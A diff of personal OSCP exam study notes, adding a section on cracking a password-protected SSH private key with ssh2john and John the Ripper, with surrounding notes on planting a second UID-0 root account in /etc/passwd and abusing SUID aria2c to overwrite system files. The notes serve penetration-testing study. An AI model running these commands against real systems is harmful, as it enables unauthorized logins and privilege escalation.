generalVader01/nextGenCoding/OSCP/OSCP_Notes.md

 	2) Adding new root account to /etc/passwd (root:password)
  	root2:2Te6hv5GiOmMc:0:0:root:/root:/bin/bash

+# Cracking Password-protected SSH Key With John

+Note: This only applies to password-protected SSH keys.
+They will look something like this:
+	-----BEGIN RSA PRIVATE KEY-----
+	Proc-Type: 4,ENCRYPTED
+	DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
+	...
+ 	-----END RSA PRIVATE KEY-----

+Convert the id_rsa into a ssh Hash:
+	ssh2john id_rsa > ssh.hash

+Crack With John:
+	john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash

+Connect up like so: ssh -i id_rsa daniela@192.168.50.244
+	Enter in the password found from john. id_rsa is required to be specified during connection

   # Aria2c

   Summary: Network Downloader tools with the SUID root bit set can be used to overwrite files, such as /etc/passwd or /root/.ssh/id_rsa